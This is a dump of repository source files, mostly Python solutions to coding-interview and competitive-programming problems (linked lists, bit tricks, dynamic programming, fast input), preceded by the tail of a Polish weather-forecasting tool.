len(expected) != len(result):\n msg = \"wielkości wektorów z oczekiwanymi i otrzymanymi wynikami powinny być identyczne\"\n L.error(msg)\n raise ValueError(msg)\n\n diffs = [abs(r - expected[i]) for i, r in enumerate(result)]\n result_sum = sum(1 if d <= tol else 0.5 if d <= 2 * tol else 0 for d in diffs)\n result_score = round(result_sum / len(diffs), dec_places)\n mean_diff = sum(diffs) / len(diffs)\n max_diff = max(diffs)\n med_diff = _median(diffs)\n sd_diff = _standard_deviation(diffs)\n\n return {\n 'result_score': round(result_score, dec_places),\n 'mean_diff': round(mean_diff, dec_places),\n 'max_diff': round(max_diff, dec_places),\n 'med_diff': round(med_diff, dec_places),\n 'sd_diff': round(sd_diff, dec_places),\n 'expected_sd': round(_standard_deviation(expected), dec_places),\n 'result_sd': round(_standard_deviation(result), dec_places),\n }\n\n\ndef predict(data: typing.Dict[datetime.datetime, dict], clf: snn.MLPClassifier, intervals: int) -> float:\n \"\"\"Prognozuje za pomocą wyznaczonego klasyfikatora MLP.\n\n Args:\n l2_data: słownik z danymi (data -> słownik z parametrami)\n clf: klasyfikator\n intervals: liczba dat potrzebnych do użycia klasyfikatora\n\n Returns:\n prognozowana wartość\n \"\"\"\n\n input_dts = list(sorted(data))[-intervals:]\n\n # print('----------------')\n # for idt in input_dts:\n # print(idt)\n # print('----------------')\n\n in_vals = _flatten(_get_input_params(input_dts, data))\n # print(in_vals)\n # print(len(in_vals))\n\n res = clf.predict([in_vals])\n # print('-- predicted ---')\n # print(res)\n res = res[0]\n # print(res)\n # print('----------------')\n\n return res\n"
},
{
"alpha_fraction": 0.54666668176651,
"alphanum_fraction": 0.54666668176651,
"avg_line_length": 17.75,
"blob_id": "f437cb17caec715d4cd9b72f6a7bf4ffbf096301",
"content_id": "bb36c217df0a5c3677dfda821f190b03c9aba14b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "permissive",
"max_line_length": 32,
"num_lines": 4,
"path": "/tools/__main__.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "from . import command_line as cl\n\nif __name__ == '__main__':\n cl.main()\n"
},
{
"alpha_fraction": 0.630476176738739,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 22.863636016845703,
"blob_id": "78040648a96f98638d325a52e23f832fae70b022",
"content_id": "1950066ba325c9d487c006b0cdbc0961e1c79f84",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 525,
"license_type": "permissive",
"max_line_length": 55,
"num_lines": 22,
"path": "/dvik_forecast/defaults.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import datetime\nimport os\n\nLOGGER_NAME = \"dvik-forecast:{}\".format(os.getpid())\n\nUTC_NOW = datetime.datetime.utcnow()\nHOME = os.path.expanduser('~')\nLOG_FILE_NAME = 'dvik_forecast.log'\nLOOP2_FILE_RE = r'loop2_\\d{6}_\\d{4}\\.dat'\nLOOP2_FILE_DT = 'loop2_%y%m%d_%H%M.dat'\n\n# args\nLOOP2_DATA_TYPE = 'loop2'\nIMGW_DATA_TYPE = 'imgw'\nOUTPUT_DIR = os.path.join(HOME, 'dvf_data', 'forecast')\nLOGS_DIR = os.path.join(HOME, 'dvf_data', 'logs')\nRANGE_DAYS = 61\nINTERVAL = 3\nTRAIN_SETS = 10\nTRAIN_DAYS = 3\nTEST_SETS = 5\nHORIZONS = [12, 24]\n"
},
{
"alpha_fraction": 0.5870455503463745,
"alphanum_fraction": 0.6003584265708923,
"avg_line_length": 38.45454406738281,
"blob_id": "19caa7b9808da692403d7493cf6e048629e54490",
"content_id": "bbea37daa8326b49e56db6f867b9758db734ea90",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3973,
"license_type": "permissive",
"max_line_length": 107,
"num_lines": 99,
"path": "/dvik_forecast/command_line.py",
"repo_name": "aquarioos/dvik-forecast",
"src_encoding": "UTF-8",
"text": "import argparse as ap\nimport os\n\nfrom . import defaults as dfs\nfrom . import forecast as fct\n\n\ndef _positive_int(value: str) -> int:\n \"\"\"Sprawdzam czy wartość jest dodatnią liczbą całkowitą. Jeśli nie, to rzuca ValueError.\n\n Args:\n value: sprawdzana wartość\n\n Returns:\n wartość, jeśli jest dodatnią liczbą całkowitą\n\n Raises:\n ValueError: jeśli podana wartość nie jest dodatnią liczbą całkowitą\n \"\"\"\n\n value = int(value)\n if value <= 0:\n raise ValueError('{} <= 0, powinno być > 0'.format(value))\n return value\n\n\ndef _parse_args() -> ap.Namespace:\n \"\"\"Parsuje parametry wejściowe:\n\n * -l2d, --loop2_dir - ścieżka do katalogu z danymi LOOP2\n * -d, --days - liczba dni wstecz (domyślnie 61)\n * -m, --m_learn - liczba próbek uczących (domyślnie 10)\n * -n, --n_test - liczba próbek testowych (domyślnie 5)\n * -o, --output_dir - katalog na wyniki (domyślnie $HOME/dvf_data/forecast)\n * -l, --logs_dir - katalog na logi (domyślnie $HOME/dvf_data/logs)\n * -i, --interval - interwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie 3)\n * -s, --horizons - horyzonty prognozy (np. 6, 12, 18, 24, domyślnie 12 i 24)\n\n Returns:\n przestrzeń argumentów\n \"\"\"\n\n parser = ap.ArgumentParser()\n\n parser.add_argument('-t', '--data_type', required=True,\n choices=(dfs.LOOP2_DATA_TYPE, dfs.IMGW_DATA_TYPE),\n help='Rodzaj danych, na podstawie których będzie wyznaczana prognoza.')\n\n parser.add_argument('-dd', '--data_dir', required=True,\n help='Ścieżka do katalogu z danymi. Musi być zgodna z rodzajem danych.')\n\n parser.add_argument('-od', '--output_dir', default=dfs.OUTPUT_DIR,\n help='Katalog na wyniki (domyślnie {}).'.format(dfs.OUTPUT_DIR))\n\n parser.add_argument('-ld', '--logs_dir', default=dfs.LOGS_DIR,\n help='Katalog na logi (domyślnie {}).'.format(dfs.LOGS_DIR))\n\n parser.add_argument('-d', '--range_days', default=dfs.RANGE_DAYS, type=_positive_int,\n help='Liczba dni wstecz (domyślnie {}).'.format(dfs.RANGE_DAYS))\n\n parser.add_argument('-i', '--interval', default=dfs.INTERVAL, choices=(1, 2, 3, 4, 6, 12), type=int,\n help='Interwał czasowy (1, 2, 3, 4, 6 lub 12, domyślnie {}).'.format(dfs.INTERVAL))\n\n parser.add_argument('-ns', '--train_sets', default=dfs.TRAIN_SETS, type=_positive_int,\n help='Liczba zbiorów uczących (domyślnie {}).'.format(dfs.TRAIN_SETS))\n\n parser.add_argument('-nd', '--train_days', default=dfs.TRAIN_DAYS, type=_positive_int,\n help='Wielkość (w dniach) zbiorów uczących'\n ' (domyślnie {}).'.format(dfs.TRAIN_SETS))\n\n parser.add_argument('-ts', '--test_sets', default=dfs.TEST_SETS, type=_positive_int,\n help='Liczba zbiorów testowych (domyślnie {}).'.format(dfs.TEST_SETS))\n\n parser.add_argument('-s', '--horizons', default=dfs.HORIZONS, type=_positive_int, nargs='+',\n help='Horyzonty prognozy (np. 6, 12, 18, 24, domyślnie {}).'\n ' Muszą być podzielne przez interwał.'.format(dfs.HORIZONS))\n\n parser.add_argument('-j', '--cfg_json',\n help=\"Ścieżka do pliku json z nadpisanymi domyślnymi parametrami klasyfikatora.\")\n\n return parser.parse_args()\n\n\ndef main():\n args = _parse_args()\n\n fct.process(\n data_type=args.data_type,\n data_dir=os.path.abspath(args.data_dir),\n cfg_json=args.cfg_json,\n output_dir=os.path.abspath(args.output_dir),\n logs_dir=os.path.abspath(args.logs_dir),\n range_days=args.range_days,\n interval=args.interval,\n train_sets=args.train_sets,\n train_days=args.train_days,\n test_sets=args.test_sets,\n horizons=args.horizons,\n )\n"
}
] | 11 |
seetaram-oruganti/Brain-Out- | https://github.com/seetaram-oruganti/Brain-Out- | 58b614c370c2bff5c4d5a783f6c20cafc673dfd6 | 2b7bcd633ec29ffa110e56a9e8faf81ccdd947a6 | 43baeecdcfa3ea2c0fa368dff52bce59b7936378 | refs/heads/master | 2022-11-27T13:05:32.338642 | 2020-07-28T18:04:19 | 2020-07-28T18:04:19 | 273,936,349 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6102941036224365,
"alphanum_fraction": 0.6259191036224365,
"avg_line_length": 23.700786590576172,
"blob_id": "3dc771b11da2b621be0c3cc62fb7f3bcbf6a3457",
"content_id": "a1b67c9655c445dd7086066ff89fd714e4c01986",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3272,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 127,
"path": "/Enormous Input Test Problem Code_INTEST.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nQUESTION\r\n\r\nEnormous Input Test Problem Code: INTEST\r\nAdd problem to Todo list\r\nSubmit\r\n\r\n \r\nThe purpose of this problem is to verify whether the method you are using to read input data is sufficiently fast to handle problems branded with the enormous Input/Output warning. You are expected to be able to process at least 2.5MB of input data per second at runtime.\r\n\r\nInput\r\nThe input begins with two positive integers n k (n, k<=107). The next n lines of input contain one positive integer ti, not greater than 109, each.\r\n\r\nOutput\r\nWrite a single integer to output, denoting how many integers ti are divisible by k.\r\n\r\nExample\r\nInput:\r\n7 3\r\n1\r\n51\r\n966369\r\n7\r\n9\r\n999996\r\n11\r\n\r\nOutput:\r\n4\r\n\"\"\"\r\n\r\n\r\n''' \r\nfast I/O methods in python for competitive programming:\r\nIn competitive programming it is important to read the input as fast as possible so we don’t lose valuable \r\ntime. We can test our input and output methods on the problem INTEST – Enormous Input Test on SPOJ. \r\nBefore you keep on reading I encourage you to solve the problem first.\r\n– Bad way:\r\nThe program below uses input and print and gets the verdict time limit exceeded.'''\r\n\"\"\"\r\ndef main():\r\n n, k = [int(c) for c in input().split()]\r\n cnt = 0\r\n for _ in range(n):\r\n t = int(input())\r\n if t % k == 0:\r\n cnt += 1\r\n print(cnt)\r\n \r\nif __name__ == \"__main__\":\r\n main() \r\n\r\n'''\r\n+ Good way:\r\nInstead of input and print we should use stdin.readline() and stdout.write(). The program below \r\ngets accepted with a runtime of 2.36 seconds.\r\n'''\r\n\r\nfrom sys import stdin, stdout \r\n \r\ndef main():\r\n n, k = [int(c) for c in input().split()]\r\n cnt = 0\r\n for _ in range(n):\r\n t = int(stdin.readline())\r\n if t % k == 0:\r\n cnt += 1\r\n stdout.write(str(cnt))\r\nif __name__ == \"__main__\":\r\n main() \r\n\r\n'''\r\n\r\n++ Better way:\r\nWe can read the whole input at once and load it into a list. The code below gets accepted with \r\na runtime of 1.70 seconds. \r\n'''\r\n\"\"\"\r\ndef main():\r\n from sys import stdin, stdout\r\n n, k = stdin.readline().split()\r\n n = int(n)\r\n k = int(k)\r\n \r\n cnt = 0\r\n lines = stdin.readlines()\r\n for line in lines:\r\n if int(line) % k == 0:\r\n cnt += 1\r\n \r\n stdout.write(str(cnt))\r\n \r\nif __name__ == \"__main__\":\r\n main()\r\n\r\n\r\n\r\n'''\r\nHow to read input in Python in Codeforces\r\nSuppose in Codeforces (or a similar online judge) you have to read numbers a b c d and print their product. In Python 3.4 you can do it as follows:\r\nMethod 1a: Using a list comprehension\r\n'''\r\n\"\"\"\r\n\r\na, b, c, d = [int(x) for x in input().split()]\r\nprint(a*b*c*d)\r\n\r\n# Method 1b: Using the map function\r\n\r\na, b, c, d = map(int, input().split())\r\nprint(a*b*c*d)\r\n\r\n# A faster way is to use stdin and stdout:\r\n# Method 2a: List comprehension with stdin and stdout\r\n\r\nfrom sys import stdin, stdout\r\na, b, c, d = [int(x) for x in stdin.readline().rstrip().split()]\r\nstdout.write( str(a*b*c*d) + \"\\n\" )\r\n\r\n# Method 2b: Map with stdin and stdout\r\n\r\nfrom sys import stdin, stdout\r\na, b, c, d = map( int, stdin.readline().rstrip().split() )\r\nstdout.write( str(a*b*c*d) + \"\\n\" )\r\n\r\n# Note that you have to convert the output a*b*c*d to a string when passing\r\n# it to the function stdout.write(…). \"\"\"\r\n"
},
{
"alpha_fraction": 0.4659009277820587,
"alphanum_fraction": 0.4730796813964844,
"avg_line_length": 20.11111068725586,
"blob_id": "e8e07094b01cafd6a12b025b8098dbdfb7c5a05c",
"content_id": "11b0b788c19f30a1f53c1b56c144fae570b832f6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1393,
"license_type": "no_license",
"max_line_length": 123,
"num_lines": 63,
"path": "/Palindrome List.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nPalindrome List\r\n\r\n Asked in: \r\n Amazon\r\n Microsoft\r\n\r\nGiven a singly linked list, determine if its a palindrome. Return 1 or 0 denoting if its a palindrome or not, respectively.\r\n\r\nNotes:\r\n\r\n Expected solution is linear in time and constant in space.\r\n\r\nFor example,\r\n\r\nList 1-->2-->1 is a palindrome.\r\nList 1-->2-->3 is not a palindrome.\r\n\r\n\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @return an integer\r\n def lPalin(self, A):\r\n slow = A\r\n fast = A\r\n prev_of_slow = None\r\n while(fast and fast.next):\r\n prev_of_slow = slow\r\n slow = slow.next\r\n fast = fast.next.next\r\n \r\n if(fast == None):\r\n prev_of_slow.next = None\r\n else:\r\n if(prev_of_slow is not None):\r\n prev_of_slow.next = None\r\n mid = slow\r\n slow = slow.next\r\n \r\n # reverse the second half\r\n cur = slow\r\n prev = None\r\n while(cur):\r\n fut = cur.next\r\n cur.next = prev\r\n prev = cur\r\n cur = fut\r\n \r\n first = A\r\n second = prev\r\n \r\n while(first and second):\r\n if(first.val != second.val):\r\n return 0\r\n first = first.next\r\n second = second.next\r\n \r\n return 1\r\n"
},
{
"alpha_fraction": 0.5322299599647522,
"alphanum_fraction": 0.5601045489311218,
"avg_line_length": 19.327102661132812,
"blob_id": "dcd4cca192e029aa5a2ea7e70a42b31c3a6f84b7",
"content_id": "4c6c2def530c382656efe3ae546b9034107288eb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2296,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 107,
"path": "/Paint House.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nPaint House!\r\n\r\n Asked in: \r\n LinkedIn\r\n\r\nProblem Description\r\n\r\nThere are a row of N houses, each house can be painted with one of the three\r\ncolors: red, blue or green.\r\n\r\nThe cost of painting each house with a certain color is different. You have\r\nto paint all the houses such that no two adjacent houses have the same color.\r\n\r\nThe cost of painting each house with a certain color is represented by a N x 3\r\ncost matrix A.\r\n\r\nFor example, A[0][0] is the cost of painting house 0 with color red; A[1][2]\r\nis the cost of painting house 1 with color green, and so on.\r\n\r\nFind the minimum total cost to paint all houses.\r\n\r\n\r\nProblem Constraints\r\n\r\n1 <= N <= 105\r\n\r\n1 <= A[i][j] <= 103\r\n\r\n\r\nInput Format\r\n\r\nFirst and only argument is an 2D integer matrix A of size N x 3 denoting the\r\ncost to paint the houses.\r\n\r\n\r\nOutput Format\r\n\r\nReturn an integer denoting the minimum total cost to paint all houses.\r\n\r\n\r\nExample Input\r\n\r\nInput 1:\r\n\r\n A = [ [1, 2, 3]\r\n [10, 11, 12]\r\n ]\r\n\r\n\r\n\r\nExample Output\r\n\r\nOutput 1:\r\n\r\n 12\r\n\r\n\r\n\r\nExample Explanation\r\n\r\nExplanation 1:\r\n\r\n Paint house 1 with red and house 2 with green i.e A[0][0] + A[1][1] = 1 + 11 = 12\r\n\r\n\r\n\r\n NOTE: You only need to implement the given function. Do not read input,\r\n instead use the arguments to the function. Do not print the output,\r\n instead return values as specified.\r\n Still have a doubt? Checkout Sample Codes for more details. \r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : list of list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n pr = 0\r\n pb = 0\r\n pg = 0\r\n n = len(A)\r\n for i in range(1, n+1):\r\n cr = A[i-1][0] + min(pb, pg)\r\n cb = A[i-1][1] + min(pr, pg)\r\n cg = A[i-1][2] + min(pb, pr)\r\n pr , pb , pg = cr, cb, cg\r\n return min(cr,cb,cg )\r\n \r\nclass Solution:\r\n # @param A : list of list of integers\r\n # @return an integer\r\n def solve(self, A):\r\n pr = 0\r\n pb = 0\r\n pg = 0\r\n n = len(A)\r\n for i in range(1, n+1):\r\n cr = A[i-1][0] + min(pb, pg)\r\n cb = A[i-1][1] + min(pr, pg)\r\n cg = A[i-1][2] + min(pb, pr)\r\n pr , pb , pg = cr, cb, cg\r\n return min(cr,cb,cg )\r\n \r\n"
},
{
"alpha_fraction": 0.5782651901245117,
"alphanum_fraction": 0.6276171207427979,
"avg_line_length": 16.574073791503906,
"blob_id": "cc2353a5be9cd11e9f33a71355ed9d4cfa9cd044",
"content_id": "baa7528591bc6737025a60e60d0bd9846c5d4f0c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2006,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 108,
"path": "/Xor Sequence.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nXor-sequence\r\n\r\n1337.43 more points to get your next star!\r\nRank: 126652|Points: 862.57/2200\r\nProblem Solving\r\nYour Xor-sequence submission got 40.00 points. \r\nYou are now 1337.43 points away from the 6th star for your problem solving badge.\r\nTry the next challenge | Try a Random Challenge\r\nProblem\r\nSubmissions\r\nLeaderboard\r\nDiscussions\r\nEditorial\r\nAn array, , is defined as follows:\r\n\r\n for , where is the symbol for XOR\r\nYou will be given a left and right index . You must determine the XOR sum of the segment of as .\r\n\r\nFor example, . The segment from to sums to .\r\n\r\nPrint the answer to each question.\r\n\r\nFunction Description\r\n\r\nComplete the xorSequence function in the editor below. It should return the integer value calculated.\r\n\r\nxorSequence has the following parameter(s):\r\n\r\nl: the lower index of the range to sum\r\nr: the higher index of the range to sum\r\nInput Format\r\n\r\nThe first line contains an integer , the number of questions.\r\nEach of the next lines contains two space-separated integers, and , the inclusive left and right indexes of the segment to query.\r\n\r\nConstraints\r\n\r\n\r\n\r\nOutput Format\r\n\r\nOn a new line for each test case, print the XOR-Sum of 's elements in the inclusive range between indices and .\r\n\r\nSample Input 0\r\n\r\n3\r\n2 4\r\n2 8\r\n5 9\r\nSample Output 0\r\n\r\n7\r\n9\r\n15\r\nExplanation 0\r\n\r\nThe beginning of our array looks like this: \r\n\r\nTest Case 0:\r\n\r\n\r\n\r\nTest Case 1:\r\n\r\n\r\n\r\nTest Case 2:\r\n\r\n\r\n\r\nSample Input 1\r\n\r\n3\r\n3 5\r\n4 6\r\n15 20\r\nSample Output 1\r\n\r\n5\r\n2\r\n22\r\n\r\n\"\"\"\r\n\r\n\r\ndef f(n):\r\n if n == 0:\r\n return 0\r\n if n == 1:\r\n return 1\r\n n -= 2\r\n if n % 8 == 0 or n % 8 == 1:\r\n return 2\r\n if n % 8 == 4 or n % 8 == 5:\r\n return 0\r\n if n % 8 == 2 or n % 8 == 3:\r\n return n + 4\r\n if n % 8 == 6 or n % 8 == 7:\r\n return n + 2\r\n assert False\r\n\r\nq = int(input())\r\nassert 1 <= q <= 10 ** 5\r\nfor i in range(q):\r\n l, r = map(int, input().split())\r\n assert 1 <= l <= r <= 10 ** 15\r\n print (f(r) ^ f(l - 1))\r\n"
},
{
"alpha_fraction": 0.43633541464805603,
"alphanum_fraction": 0.4767080843448639,
"avg_line_length": 17.78125,
"blob_id": "7222a083cd7e425c985e5cbd36fab800c41c69dd",
"content_id": "9efdf8565d9beccd901cd517489b67905bcc1a7e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1288,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 64,
"path": "/Single no 2.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nSingle Number II\r\nAsked in: \r\nGoogle\r\nAmazon\r\nGiven an array of integers, every element appears thrice except for one which occurs once.\r\n\r\nFind that element which does not appear thrice.\r\n\r\nNote: Your algorithm should have a linear runtime complexity.\r\n\r\nCould you implement it without using extra memory?\r\n\r\nInput Format:\r\n\r\n First and only argument of input contains an integer array A\r\nOutput Format:\r\n\r\n return a single integer.\r\nConstraints:\r\n\r\n2 <= N <= 5 000 000 \r\n0 <= A[i] <= INT_MAX\r\nFor Examples :\r\n\r\nExample Input 1:\r\n A = [1, 2, 4, 3, 3, 2, 2, 3, 1, 1]\r\nExample Output 1:\r\n 4\r\nExplanation:\r\n 4 occur exactly once\r\nExample Input 2:\r\n A = [0, 0, 0, 1]\r\nExample Output 2:\r\n 1\r\n\r\n\"\"\"\r\n\r\n\r\n\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n # @return an integer\r\n def singleNumber(self, A):\r\n k = 31\r\n c1 = 0\r\n c0 = 0\r\n s = \"\"\r\n while(k>-1):\r\n c1 = 0\r\n c0 = 0\r\n for i in A:\r\n if(i&(1<<k)):\r\n c1 += 1\r\n else:\r\n c0 += 1\r\n if(c1%3):\r\n s = s + \"1\"\r\n else:\r\n s = s + \"0\"\r\n k -= 1\r\n \r\n return (int(s,2)) \r\n \r\n"
},
{
"alpha_fraction": 0.42891639471054077,
"alphanum_fraction": 0.4388771653175354,
"avg_line_length": 21.934782028198242,
"blob_id": "e28d2008339dcf9088835b5630f2cfc16c009d6c",
"content_id": "95f5e577d136b4f69671fb15d36a6edd72d91731",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3319,
"license_type": "no_license",
"max_line_length": 143,
"num_lines": 138,
"path": "/Reverse Link List II.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\nReverse Link List II\r\n\r\n Asked in: \r\n Facebook\r\n Microsoft\r\n Amazon\r\n\r\nReverse a linked list from position m to n. Do it in-place and in one-pass.\r\n\r\nFor example:\r\nGiven 1->2->3->4->5->NULL, m = 2 and n = 4,\r\n\r\nreturn 1->4->3->2->5->NULL.\r\n\r\n Note:\r\n Given m, n satisfy the following condition:\r\n 1 ≤ m ≤ n ≤ length of list.\r\n\r\n Note 2:\r\n Usually the version often seen in the interviews is reversing the whole linked list which is obviously an easier version of this question. \r\n\r\n\r\n\r\n\r\n\"\"\"\r\n\r\n\r\n##### Editorial #######\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.next = None\r\n\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @param C : integer\r\n # @return the head node in the linked list\r\n def reverseBetween(self, A, B, C):\r\n \r\n # 1->2->3->4->5->NULL, m = 2 and n = 4,\r\n # 1->4->3->2->5->NULL.\r\n\r\n head = A\r\n current = A\r\n prv = None\r\n nxt = None\r\n \r\n step = 1\r\n \r\n while current is not None:\r\n \r\n if step < B:\r\n prv = current\r\n current = current.next\r\n\r\n if step >= B and step <= C:\r\n if step == B:\r\n # this is a start of the reversed list\r\n last_non_reversed = prv\r\n last_reversed = current\r\n \r\n if step == C:\r\n # this is the end of the reversed list\r\n first_reversed = current\r\n first_non_reversed = current.next\r\n \r\n # part that does reverse\r\n nxt = current.next\r\n current.next = prv\r\n prv = current\r\n current = nxt\r\n\r\n if step > C:\r\n # We can skip these steps\r\n break\r\n \r\n step += 1\r\n \r\n if last_non_reversed is not None:\r\n last_non_reversed.next = first_reversed\r\n \r\n last_reversed.next = first_non_reversed\r\n \r\n if B == 1:\r\n # In this case we did reverse from the very first element\r\n head = prv\r\n \r\n return head\r\n\r\n\r\n\r\n######## Tried Working#####\r\n\r\n\r\n# Definition for singly-linked list.\r\n# class ListNode:\r\n# def __init__(self, x):\r\n# self.val = x\r\n# self.ne\r\nclass Solution:\r\n # @param A : head node of linked list\r\n # @param B : integer\r\n # @param C : integer\r\n # @return the head node in the linked list\r\n def reverseBetween(self, A, B, C):\r\n prev = other = start = None\r\n end = tmp = A\r\n i = 1\r\n\r\n while tmp:\r\n if i == B - 1:\r\n start = tmp\r\n\r\n if i == B:\r\n end = tmp\r\n\r\n if i >= B and i <= C:\r\n next = tmp.next\r\n tmp.next = prev\r\n prev = tmp\r\n tmp = next\r\n else:\r\n tmp = tmp.next\r\n\r\n if i == C:\r\n other = tmp\r\n\r\n i += 1\r\n\r\n end.next = other\r\n if start: start.next = prev\r\n return prev if B == 1 else A\r\n \r\n"
},
{
"alpha_fraction": 0.35481852293014526,
"alphanum_fraction": 0.3917396664619446,
"avg_line_length": 22.060606002807617,
"blob_id": "cbb214ba028408421af73b106516026c1f3ba2ef",
"content_id": "e910b819b6f9097ffa337ab2d73548f8369b9bbb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1598,
"license_type": "no_license",
"max_line_length": 89,
"num_lines": 66,
"path": "/Largest Number.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\nGiven a list of non negative integers,\r\narrange them such that they form the largest number.\r\n\r\nFor example:\r\n\r\nGiven [3, 30, 34, 5, 9], the largest formed number is 9534330.\r\n\r\nNote: The result may be very large, so you need to return a string instead of an integer.\r\n\r\n\"\"\"\r\n\r\nclass Solution:\r\n # @param A : tuple of integers\r\n \r\n # @return a strings\r\n def largestNumber(self, A):\r\n n = len(A)\r\n A = list(A)\r\n self.merges(A, 0, n-1)\r\n s = \"\"\r\n \r\n for i in A:\r\n s = s+str(i)\r\n if(0 == int(s)):\r\n return 0\r\n return s\r\n \r\n def merges(self, ar,l,h):\r\n if(l==h):\r\n return\r\n mid=(l+h)//2\r\n self.merges(ar,l,mid)\r\n self.merges(ar,mid+1,h)\r\n self.merge(ar,l,mid,h)\r\n \r\n def merge(self,ar,l,mid,h):\r\n p1 = l\r\n p2 = mid+1\r\n k = 0\r\n size = h-l+1\r\n temp = [0]*size\r\n while((p1<=mid) and (p2<=h)):\r\n s1 = str(ar[p1])+str(ar[p2])\r\n s2 = str(ar[p2])+str(ar[p1])\r\n if(int(s2)>int(s1)):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n else:\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p1<=mid):\r\n temp[k] = ar[p1]\r\n k = k+1\r\n p1 = p1+1\r\n \r\n while(p2<=h):\r\n temp[k] = ar[p2]\r\n k = k+1\r\n p2 = p2+1\r\n for i in range(l,h+1):\r\n ar[i] = temp[i-l]\r\n \r\n"
},
{
"alpha_fraction": 0.49300700426101685,
"alphanum_fraction": 0.5384615659713745,
"avg_line_length": 14.342857360839844,
"blob_id": "f6aaf63f547ca2974f9adf7b01205da5a50b5439",
"content_id": "965a69b2f37d7c944e195fac012a017b53bfdae0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 572,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 35,
"path": "/Reverse integer.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\nReverse integer\r\nAsked in: \r\nHCL\r\nBloomberg\r\nReverse digits of an integer.\r\n\r\nExample1:\r\n\r\nx = 123,\r\n\r\nreturn 321\r\nExample2:\r\n\r\nx = -123,\r\n\r\nreturn -321\r\n\r\nReturn 0 if the result overflows and does not fit in a 32 bit signed integer\r\n\r\n\"\"\"\r\n\r\n\r\nclass Solution:\r\n # @param A : integer\r\n # @return an integer\r\n def reverse(self, A):\r\n sgn = -1 if A < 0 else 1\r\n A = abs(A)\r\n string = str(A)\r\n reverse = string[::-1]\r\n result = int(reverse)\r\n if result > 2**31 - 1:\r\n return 0\r\n return sgn * result\r\n"
},
{
"alpha_fraction": 0.4859693944454193,
"alphanum_fraction": 0.5059523582458496,
"avg_line_length": 20.380952835083008,
"blob_id": "2ee4906c78b7ca18f12c4e71d5a7f09a7f442f44",
"content_id": "74f4d59dc3d92e869b9590e1564c2c40af2c15c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2352,
"license_type": "no_license",
"max_line_length": 213,
"num_lines": 105,
"path": "/Height of Tree.py",
"repo_name": "seetaram-oruganti/Brain-Out-",
"src_encoding": "UTF-8",
"text": "\"\"\"\r\n\r\n\r\n\r\nHeight of Tree\r\n\r\n Problem\r\n Submissions\r\n Leaderboard\r\n Discussions\r\n\r\nGiven an array of unique elements, construct a Binary Search Tree and find the height of the tree.\r\n\r\nInput Format\r\n\r\nFirst line of input contains T - number of test cases. Its followed by 2T lines. First line of each test case contains N - number of nodes in the BST. The next line contains N unique integers - value of the nodes.\r\n\r\nConstraints\r\n\r\n1 <= T <= 1000\r\n1 <= N <= 1000\r\n0 <= ar[i] <= 10000\r\n\r\nOutput Format\r\n\r\nFor each test case, print the height of the Binary Search Tree, separated by newline.\r\n\r\nSample Input 0\r\n\r\n3\r\n5\r\n1 2 3 4 5 \r\n5\r\n3 2 4 1 5 \r\n7\r\n4 5 15 0 1 7 17 \r\n\r\nSample Output 0\r\n\r\n4\r\n2\r\n3\r\n\r\n\r\n\"\"\"\r\n\r\n\r\nclass Node:\r\n def __init__(self, info): \r\n self.info = info \r\n self.left = None \r\n self.right = None \r\n self.level = None \r\n\r\n def __str__(self):\r\n return str(self.info) \r\n\r\nclass BinarySearchTree:\r\n def __init__(self): \r\n self.root = None\r\n\r\n def 